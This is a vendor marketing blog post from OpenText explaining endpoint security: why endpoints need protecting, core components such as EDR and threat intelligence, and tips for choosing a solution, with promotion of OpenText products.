The thought that a chain is only as strong as its weakest link is something that can keep IT security professionals awake at night. Today, many large organizations are managing more than 50,000 individual endpoints, with some responsible for in excess of 500,000. That’s a whole lot of entry points – a fact that hackers have not been slow to grasp. Securing and protecting your endpoints is now perhaps the most important element of information security. So what should you look for from your endpoint security tools?
What is endpoint security?
To understand endpoint security, we need to define an endpoint. An endpoint can be thought of as any entry point onto your corporate network. This could be end-user devices such as a desktop or laptop but also printers, routers, servers as well as mobile and Internet of Things (IoT) devices including wearables. Traditional network security is not sufficient to protect these access points so a new generation of endpoint security solutions have emerged.
Cyber criminals have been quick to seize on the vulnerability of network endpoints leading to the need for more advanced endpoint security solutions. Today, these systems are designed to quickly detect, analyze and block cyber-attacks in progress as well as identify, contain and remediate breaches quickly when they occur.
To achieve this, the range of endpoint security systems need to collaborate with each other and other security products to give your organization full visibility and control over all endpoint security risks and threats.
Why you need endpoint security
It’s often said that endpoint security has grown out of anti virus and anti-malware software. While true, this is a little simplistic. The growing number of poorly protected endpoints, as well as cyberattacks that are increasingly sophisticated and cunning, has meant the need to develop an information security approach built on layers of defense, that in aggregate does far more than block known viruses or applications from executing on your network.
The rapid development of artificial intelligence and machine learning coupled with the vast amount of data generated from these endpoints has enabled a new generation of endpoint security tools that can adapt better to detecting new threats while introducing proactive measures – such as real-time threat hunting.
In 2017, a casino in the United States was hacked. There was nothing unusual about that except that the criminals gained access through an IoT-enabled thermometer in the casino’s fish tank! This serves to highlight how difficult it is to fully understand how many endpoints you have to consider when setting your endpoint security strategy. At the same time, even the most well-known endpoint security threats continue to pose major risks. In June 2021, the world’s largest meat processor, JBS, admitted it had paid hackers $11 million – the most ever paid for a ransomware attack.
According to a joint OpenText and SANS endpoint security survey, almost a third of respondents said attackers had accessed their endpoints, with 77% admitting they found it difficult to identify what data was breached or simply didn’t know at all.
The need for a comprehensive and integrated endpoint security solution continues to grow driven by several factors, including:
Proliferation of endpoints
The idea that user devices such as desktops or laptops are the only endpoints you need to protect is a distant memory. The OpenText and SANS survey’s list of endpoints includes:
- Mobile devices
- Cloud based systems
- IoT devices
- POS devices
- Smart sensors
- Smart systems
- Building controls
- Environmental controls
- Physical perimeter security systems
Cybersecurity has been described as an ‘arms race’. As you get a handle on one form of attack, the criminals have already adapted or have developed an entirely new attack vector. Recent developments such as fileless malware – that uses legitimate programs to attack and leaves no obvious footprint –and zero day attacks – where hackers exploit a vulnerability before it’s known about or fixed demonstrate just how sophisticated these attacks can be.
The COVID-19 pandemic saw a massive acceleration in remote working as many organizations let their employees work safely from home. This however, required very rapidly introducing the IT infrastructure to allow this to happen. It meant that there were suddenly far more endpoints that needed secure access to the network. In fact, a new phrase ‘Zoombombing’ was coined to describe hackers attacking Zoom meetings.
As cloud, 5G and IoT technologies mature, organizations are looking to move content, data and processing closer to the applications, things and users that interact with them through edge computing. This has created more intelligent endpoints but as many IoT devices and sensors have not traditionally been designed with security in mind this inevitably leads to massive vulnerabilities as the amount of devices expands within an organization.
Key components of endpoint security
While endpoint security may sound like a single category, it is comprised of different components. Key elements of endpoint security systems include:
Endpoint Detection and Response
Endpoint Detection and Response (EDR) solutions continuously monitor all endpoints for rapid threat detection and automated response. The best EDR systems analyze – using heuristics and behavioral analysis – the vast amounts of data from endpoints to automatically detect and respond in real-time to known threats. In addition, EDR solutions with data forensic capabilities provide the required visibility to uncover malicious activity no matter how well hidden. This also allows organizations to quickly identify the source and scope of breaches and allow for remedial actions to be taken.
Cyber-threat intelligence is information about threats and threat actors that helps mitigate harmful events in cyberspace. Threat intelligence solutions combine information from a wide range of sources – such as open-source databases and social media – to allow other endpoint security tools to learn and monitor for known threats to combat malware and phishing attacks amongst others. For example, Webroot BrightCloud is a global knowledge base over 43 billion URLs, and over 37 billion detailed file behavior records that allows organizations to quicky verify malware, malicious, and trustworthy files.
Data Protection & Back up
With the growth of ransomware, the ability to implement an effective back-up and disaster recovery strategy has never been greater. Organizations can’t afford the operational or reputational damage of having their data held to ransom. Data protection and back up solutions allow for data to be recovered in minutes and the recovery point to be very close to the last safe instance. In this way, your business can recover operations quickly and steps can be taken to remediate or remove the affected data.
Key capabilities of endpoint security
The key capabilities for enterprise endpoint security solutions include:
- Detection of security threats including malware that uses file-based and fileless exploits
- White- and blacklisting (allow/block) of software, scripts and processes
- Real-time threat detection with behavioral analysis of device activity, application and user data
- Automated response to identified threats to remove or contain them, and notify security personnel
- Rolling back endpoints and data to a previous state in the event of a ransomware attack or system corruption
- Endpoint isolation and sandboxing for suspect endpoints and processes
- Forensic response capabilities assisting scope and root-cause analysis
- Methods to detect insider activity and system mis-use
Best practices for endpoint security
Traditionally, organizations have often deployed a range of endpoint security tools that has created a patchwork of isolated point solutions with silos of data. Worse still, this situation leads to the proliferation of false positives which makes the work of the IT security team that much more complicated and increases the chance that actual exploits are missed.
Endpoint Protection Platforms often lack the necessary threat detection and response capabilities. The best practice for endpoint security is to combine as many of its constituent components together as possible. Integrating your EPP with EDR solutions is the minimum but effective layers of defense are created when all components work together and with other network security solutions.
In addition, the proliferation of endpoint devices has changed the game for endpoint security. As the fish tank example demonstrates, endpoint security moves the responsibility of IT security teams into traditionally non-IT spaces. IoT is increasingly linking the digital and physical worlds and a broader information management perspective is required to ensure that the content and data now held on each endpoint is properly managed and secure.
How to select the best endpoint security solutions
The type of endpoint security you need depends on your specific business requirements but here are a few tips to help you select the endpoint security tools for you:
Continuous endpoint monitoring
Time (and ransomware) has proven that sooner or later, every organization will likely be compromised. The endpoint security solution you choose must be able to continuously monitor all your endpoints to quickly spot malicious or unusual behavior and it must be able to analyze endpoint data in near real time to understand the scope of any attack from start to finish. The best endpoint security systems also give visibility into where malware came from, where it’s been and what it’s doing – as well as help determine the best way to end the attack and remediate the damage.
Rapid detection and response
The best Endpoint Detection and Response solutions can reduce breach identification and remediation times from many months (or years!) to a matter of minutes. Integrating with threat intelligence, the endpoint security tool uses the most up-to-date tools, tactics, and procedures (TTPs) and attack behavioral indicators to prioritize threat alerts and reduce false positives. This allows you to respond quickly and effectively as well as applying digital forensics to accelerate investigations and reduce management complexity by easily searching across all endpoints for indications of compromise or malware artifacts.
Using a single source for endpoint security solutions
Endpoint security can often become a mix of siloed point products. In fact, no one solution will provide the level of security and protection you need. Many organizations are finding it beneficial to find an endpoint security software supplier with a comprehensive portfolio of complementary solutions with native integration to one another. For example, OpenText provides targeted solutions covering Endpoint Detection and Response, Threat Intelligence and Data Protection and Back up.
Take advantage of managed detection and response services
The advances in cloud-based endpoint security solutions mean that more providers are offering endpoint security as a managed service. The best endpoint security services will be tailored to your business needs and allows you to benefit from access to the correct level of security skills and resources delivered on a flexible and scalable basis. The larger endpoint security providers can deliver global coverage taking into account security and data regulations in the markets and geographies where you operate. OpenText MDR combines best-in-breed technologies alongside security personnel to support customers globally by continuously gathering insights on the most recent tactics, techniques, and procedures (TTP’s) used by threat actors.
Learn more about OpenText Enterprise Security solutions.
Author: Alexis Robbins, Senior Product Marketing Manager